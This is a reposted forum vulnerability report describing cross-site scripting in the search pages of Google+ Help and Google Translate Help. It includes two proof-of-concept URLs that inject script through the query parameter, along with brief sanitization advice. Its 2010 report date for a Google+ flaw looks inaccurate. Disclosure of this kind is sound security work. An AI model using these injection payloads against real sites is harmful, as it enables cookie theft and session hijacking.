• Google+ Help Support & Google Translator Help Support [XSS]

    ------------------------------------------------------------------
    0x1 Affected Script: Google+ Help Support & Google+ Help Support & Google Translator Help Support

    0x2 Script Link: http://translate.google.com/ & http://plus.google.com/
    0x4 Author: Sandeep kamble
    0x5 Reported : June 30 2010
    0x6 Public Release July 21 2010
    ------------------------------------------------------------------

    Affected Script Overview : Google+ Help Center where you can find tips and tutorials on using Google+ and other answers to frequently asked questions and Google Translate Help Center where you can find tips and tutorials on using Google Translate and other answers to frequently asked questions.

    Affected script :

    1) +/bin/search.py?query=
    2) support/bin/search.py?query= (Subdomain Translator)

    Exploit : Executing Javascript using the vulnerable variable called as ?Query . This attack is commonly know as Cross Site Scripting (XSS)
    Google + affected script having stored Xss attack which can used for the grabbing the cookies .
    Google Translator Non-persistent XSS attack which can be used to execute only the JS Script

    POC :
    1) Google +
    Code:
    http://www.google.com/support/+/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27ss%27%29%3C/script%3E&btnG=Search

    Don't shock , you might be thinking the payload "alert('ss')" and give output as "XSS" in message . This is happen due to spelling (google function did u meant it) ..

    Try to search this keyword
    Code:
    <script>alert('ss')</script>
    you will get the answer why it was coming.

    2) Translator Google
    Code:
    http://translate.google.com/support/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27s%27%29%3C%2Fscript%3E&btnG=Search+Help&ctx=en%3Asearchbox
    I don't have screen shot of Google translator XSS attack.

    Countermeasure

    1) Determine whether HTML output includes input parameters
    2) In short perform input sanitization

    Special Thanks : Rahul fbone , Bond, 41.w4r10r, Subhash, ShriNivas , Vishal , Yogesh, Darshit


    Finally you can See my name at
    Code:
    http://www.google.com/about/corporate/company/halloffame.html
    /peace

    Sandeep k
    This article was originally published in forum thread: Google+ Help Support & Google Translator Help Support [XSS] started by [s] View original post
  • G4H Facebook

  • G4H Twitter